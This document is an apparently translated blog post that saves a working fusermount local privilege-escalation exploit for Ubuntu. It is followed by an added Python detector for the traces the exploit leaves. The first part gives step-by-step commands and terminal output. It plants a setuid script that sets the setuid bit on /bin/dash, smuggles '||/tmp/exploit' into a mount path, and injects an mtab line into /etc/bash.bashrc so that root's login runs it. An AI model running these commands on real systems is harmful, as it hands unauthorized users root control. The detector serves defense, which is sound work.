/* FUSE exploit: closed in all Ubuntu OS versions */
/* I haven't done a proper analysis yet; I'm just saving the code here for now :D */
/* If I get some free time again, I'll write up a detailed analysis report and post it!! */
/* https://gist.github.com/taviso/ecb70eb12d461dd85cba */
<Vulnerable version>
<TEST>
1. As a normal (unprivileged) user, enter the commands in the order shown below.
2. Once the normal user has entered everything up through the 'LIBMOUNT_MTAB' line, root logs in to the server.
3. The normal user is escalated to root.
[User]
blackcon@bk:~$
blackcon@bk:~$ id
uid=1000(blackcon) gid=1000(blackcon) 그룹들=1000(blackcon),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),123(sambashare)
blackcon@bk:~$ sh -c 'id'
uid=1000(blackcon) gid=1000(blackcon) 그룹들=1000(blackcon),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),123(sambashare)
blackcon@bk:~$ printf "chmod 4755 /bin/dash" > /tmp/exploit && chmod 7555 /tmp/exploit
blackcon@bk:~$ ls -la /tmp
합계 44
drwxrwxrwt 9 root root 4096 5월 22 16:05 .
drwxr-xr-x 24 root root 4096 5월 14 21:28 ..
drwxrwxrwt 2 root root 4096 5월 22 08:56 .ICE-unix
-r--r--r-- 1 root root 11 5월 22 08:56 .X0-lock
drwxrwxrwt 2 root root 4096 5월 22 16:04 .X11-unix
drwxrwxrwt 2 root root 4096 5월 22 15:59 VMwareDnD
-rw------- 1 blackcon blackcon 0 5월 22 08:56 config-err-8RAdOZ
-r-sr-sr-t 1 blackcon blackcon 20 5월 22 16:05 exploit
drwx------ 2 root root 4096 5월 22 08:56 pulse-PKdhtXMmr18n
drwx------ 2 blackcon blackcon 4096 5월 22 08:56 ssh-dffCiUhLpXS1
drwx------ 2 blackcon blackcon 4096 5월 22 15:59 vmware-blackcon
drwx------ 2 root root 4096 5월 22 08:56 vmware-root
blackcon@bk:~$ mkdir -p '/tmp/exploit||/tmp/exploit'
blackcon@bk:~$ ls -ls /tmp
합계 28
4 drwxrwxrwt 2 root root 4096 5월 22 15:59 VMwareDnD
0 -rw------- 1 blackcon blackcon 0 5월 22 08:56 config-err-8RAdOZ
4 -r-sr-sr-t 1 blackcon blackcon 20 5월 22 16:05 exploit
4 drwxrwxr-x 3 blackcon blackcon 4096 5월 22 16:06 exploit||
4 drwx------ 2 root root 4096 5월 22 08:56 pulse-PKdhtXMmr18n
4 drwx------ 2 blackcon blackcon 4096 5월 22 08:56 ssh-dffCiUhLpXS1
4 drwx------ 2 blackcon blackcon 4096 5월 22 15:59 vmware-blackcon
4 drwx------ 2 root root 4096 5월 22 08:56 vmware-root
blackcon@bk:~$ LIBMOUNT_MTAB=/etc/bash.bashrc _FUSE_COMMFD=0 fusermount '/tmp/exploit||/tmp/exploit'
fusermount: failed to open /etc/fuse.conf: Permission denied
sending file descriptor: Socket operation on non-socket
blackcon@bk:~$ cat /etc/bash.bashrc
/dev/fuse /tmp/exploit||/tmp/exploit fuse rw,nosuid,nodev,user=blackcon 0 0
blackcon@bk:~$ sh -c 'id'
uid=1000(blackcon) gid=1000(blackcon) euid=0(root) 그룹들=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),123(sambashare),1000(blackcon)
blackcon@bk:~$ sh -c 'sh'
# id
uid=1000(blackcon) gid=1000(blackcon) euid=0(root) 그룹들=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),123(sambashare),1000(blackcon)
#
========================================
[root] <- just login
blackcon@bk:~$ sudo su
[sudo] password for blackcon:
bash: /dev/fuse: 허가 거부
root@jihwan:/home/jh304# id
uid=0(root) gid=0(root) groups=0(root)
root@bk:/home/blackcon#
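A defender-side check, added here and not part of the original post or the gist it links. It flags mtab-style records written into a shell startup file (as in the /etc/bash.bashrc shown above: when root's bash sources that file, the line runs /dev/fuse as a command, which fails, and the `||` then runs /tmp/exploit) and setuid/setgid files that root does not own (as /tmp/exploit was). The helper names, the startup-file paths and the SAMPLE_BASHRC contents are assumptions constructed for this example.

```python
import os
import re
import stat

# Constructed sample: /etc/bash.bashrc as it looks after the fusermount run above.
SAMPLE_BASHRC = """\
# System-wide .bashrc file for interactive bash(1) shells.
[ -z "$PS1" ] && return
/dev/fuse /tmp/exploit||/tmp/exploit fuse rw,nosuid,nodev,user=blackcon 0 0
"""

# fstab/mtab record: device mountpoint fstype options dump pass
MTAB_LINE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+\d+\s+\d+\s*$")
SHELL_META = re.compile(r"[|;&`$(){}<>]")

def find_injected_mtab_lines(text):
    """Return [(lineno, mountpoint)] for mtab-style records in a shell startup
    file; a mountpoint containing ||, ; etc. is executed when the file is sourced."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = MTAB_LINE.match(line.strip())
        if m and (m.group(1).startswith("/dev/") or SHELL_META.search(m.group(2))):
            hits.append((n, m.group(2)))
    return hits

def suspicious_setuid(entries):
    """entries: iterable of (path, st_mode, st_uid). Flags regular files with
    setuid/setgid set that root does not own (cf. /tmp/exploit in the listing)."""
    return [p for p, mode, uid in entries
            if stat.S_ISREG(mode) and mode & (stat.S_ISUID | stat.S_ISGID) and uid != 0]

def scan_dir(path):
    """Check every entry of one directory (e.g. /tmp) with suspicious_setuid."""
    stats = [(e.path, e.stat(follow_symlinks=False)) for e in os.scandir(path)]
    return suspicious_setuid((p, st.st_mode, st.st_uid) for p, st in stats)

def scan_startup_files(paths=("/etc/bash.bashrc", "/etc/profile")):
    """Read each startup file that exists and report injected mtab records."""
    report = {}
    for p in paths:
        try:
            with open(p) as f:
                hits = find_injected_mtab_lines(f.read())
        except OSError:
            continue
        if hits:
            report[p] = hits
    return report
```

Run `scan_startup_files()` and `scan_dir("/tmp")` on a host to check it; the tampered mtab line and the non-root setuid file are the two artifacts this particular technique leaves behind.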